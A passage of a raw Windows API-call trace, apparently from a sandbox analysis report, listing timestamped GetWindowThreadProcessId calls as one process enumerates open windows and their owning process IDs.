	[0614.028] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x240
	[0614.028] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x790
	[0614.028] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x61c
	[0614.028] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x540
	[0614.028] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x538
	[0614.028] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x568
	[0614.028] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x538
	[0614.028] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x568
	[0614.029] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x538
	[0614.029] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x540
	[0614.029] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x540
	[0614.029] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x57c
	[0614.029] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x460
	[0614.029] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x554
	[0614.029] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0614.029] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x528
	[0614.030] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0614.030] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0614.030] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0614.030] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x79c
	[0614.030] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0614.030] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4e0
	[0614.030] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0614.030] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x460
	[0614.031] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x460
	[0614.031] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x44c
	[0614.031] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x778
	[0614.031] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x460
	[0614.031] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x558
	[0614.031] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0614.031] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0614.031] GetWindowThreadProcessId (in: hWnd=0x2037c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1bb4
	[0614.032] GetWindowThreadProcessId (in: hWnd=0x204d4, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x10bc
	[0614.032] GetWindowThreadProcessId (in: hWnd=0x20376, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1b50
	[0614.032] GetWindowThreadProcessId (in: hWnd=0x108ba, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x14b4
	[0614.032] GetWindowThreadProcessId (in: hWnd=0x108b4, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x149c
	[0614.032] GetWindowThreadProcessId (in: hWnd=0x108ae, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x14a8
	[0614.032] GetWindowThreadProcessId (in: hWnd=0x108a2, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1490
	[0614.032] GetWindowThreadProcessId (in: hWnd=0x10890, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x14a4
	[0614.032] GetWindowThreadProcessId (in: hWnd=0x1087e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x148c
	[0614.033] GetWindowThreadProcessId (in: hWnd=0x1084a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1458
	[0614.033] GetWindowThreadProcessId (in: hWnd=0x10840, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1b4c
	[0614.033] GetWindowThreadProcessId (in: hWnd=0x20616, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1b3c
	[0614.033] GetWindowThreadProcessId (in: hWnd=0x10838, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x19bc
	[0614.033] GetWindowThreadProcessId (in: hWnd=0x10828, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x199c
	[0614.033] GetWindowThreadProcessId (in: hWnd=0x10824, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1998
	[0614.033] GetWindowThreadProcessId (in: hWnd=0x10820, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1994
	[0614.033] GetWindowThreadProcessId (in: hWnd=0x1081c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1990
	[0614.034] GetWindowThreadProcessId (in: hWnd=0x10812, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1984
	[0614.034] GetWindowThreadProcessId (in: hWnd=0x1080c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x197c
	[0614.034] GetWindowThreadProcessId (in: hWnd=0x10808, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1978
	[0614.034] GetWindowThreadProcessId (in: hWnd=0x107e4, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1824
	[0614.034] GetWindowThreadProcessId (in: hWnd=0x107d0, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1088
	[0614.034] GetWindowThreadProcessId (in: hWnd=0x107c4, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1908
	[0614.034] GetWindowThreadProcessId (in: hWnd=0x107b6, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x18cc
	[0615.018] GetWindowThreadProcessId (in: hWnd=0x1079c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x18d0
	[0619.901] GetWindowThreadProcessId (in: hWnd=0x10792, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1840
	[0619.905] GetWindowThreadProcessId (in: hWnd=0x10780, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x10c4
	[0621.430] GetWindowThreadProcessId (in: hWnd=0x1077a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x128c
	[0621.436] GetWindowThreadProcessId (in: hWnd=0x10776, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x16e8
	[0621.440] GetWindowThreadProcessId (in: hWnd=0x204a2, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x16cc
	[0622.373] GetWindowThreadProcessId (in: hWnd=0x10768, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x274
	[0622.790] GetWindowThreadProcessId (in: hWnd=0x10764, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x10e0
	[0622.795] GetWindowThreadProcessId (in: hWnd=0x10760, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x10cc
	[0622.798] GetWindowThreadProcessId (in: hWnd=0x1075c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x10c0
	[0622.801] GetWindowThreadProcessId (in: hWnd=0x30750, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x10d0
	[0624.671] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1198
	[0624.681] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1080
	[0624.685] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1074
	[0624.688] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x106c
	[0624.691] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1474
	[0624.694] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1414
	[0624.695] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xbd0
	[0624.697] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x550
	[0625.441] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xa38
	[0625.640] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x16d0
	[0626.461] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x16d4
	[0626.931] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x15bc
	[0626.935] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x15a0
	[0626.941] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x159c
	[0626.945] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1598
	[0627.862] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1594
	[0629.495] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1590
	[0629.713] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x158c
	[0629.720] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1588
	[0629.724] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1584
	[0629.726] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1580
	[0629.732] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x157c
	[0629.734] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1488
	[0629.735] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1404
	[0631.881] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x11b8
	[0631.881] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xbd4
	[0631.881] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xe0c
	[0631.881] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xd30
	[0631.881] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xe70
	[0631.881] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x13b8
	[0631.881] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xe20
	[0631.881] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xe2c
	[0631.882] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xe00
	[0631.882] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xe04
	[0631.882] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xc94
	[0631.882] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x13b0
	[0631.882] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x13ac
	[0631.882] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x13a8
	[0631.882] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1374
	[0631.882] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x132c
	[0631.882] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1328
	[0631.882] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x12d0
	[0631.882] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x12cc
	[0631.882] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x12c8
	[0631.882] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1290
	[0631.883] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1218
	[0631.883] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1214
	[0631.883] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x11ec
	[0631.883] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x11e8
	[0631.883] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x11cc
	[0631.883] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1140
	[0631.883] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xe6c
	[0631.883] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x6e8
	[0631.883] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xc6c
	[0631.883] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xf94
	[0631.883] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xffc
	[0631.884] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xf74
	[0631.884] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xf08
	[0631.884] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xf0c
	[0631.884] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xed8
	[0631.884] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xe90
	[0631.884] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xea8
	[0631.884] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xfa8
	[0631.884] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xfbc
	[0631.884] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xfb8
	[0631.885] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xfb4
	[0631.885] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xfb0
	[0631.885] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xfac
	[0631.885] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xfc0
	[0631.885] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xfd0
	[0631.885] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xf88
	[0631.885] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xf84
	[0631.885] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xf80
	[0631.886] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xde0
	[0631.886] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xddc
	[0631.886] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xdd8
	[0631.886] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xd34
	[0631.886] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xd10
	[0631.886] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xd0c
	[0631.886] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xc9c
	[0631.886] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xc74
	[0631.886] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xc1c
	[0631.887] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xc08
	[0631.887] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xabc
	[0631.887] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x24c
	[0631.887] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xbb0
	[0631.887] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xbfc
	[0631.887] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xb10
	[0631.887] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x374
	[0631.887] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x368
	[0631.887] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xb28
	[0631.887] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xae8
	[0631.887] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xb14
	[0631.887] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x95c
	[0631.887] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xa8c
	[0631.888] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x46c
	[0631.888] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xb3c
	[0631.888] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xa90
	[0631.888] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xad0
	[0631.888] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xa9c
	[0631.888] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xaa0
	[0631.888] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xb1c
	[0631.888] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x7e0
	[0631.888] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xa74
	[0631.888] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x694
	[0631.888] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xa28
	[0631.888] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x9b0
	[0631.889] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x8d8
	[0631.889] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x940
	[0631.889] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x93c
	[0631.889] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4ec
	[0631.889] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x150
	[0631.889] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x720
	[0631.889] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x3c4
	[0631.889] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x7d4
	[0631.889] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x6c8
	[0631.889] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xb54
	[0631.889] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xb54
	[0631.889] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xb5c
	[0631.889] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x838
	[0631.890] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x818
	[0631.890] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x5b8
	[0631.890] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x494
	[0631.890] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1ec
	[0631.890] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x440
	[0631.890] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x7e8
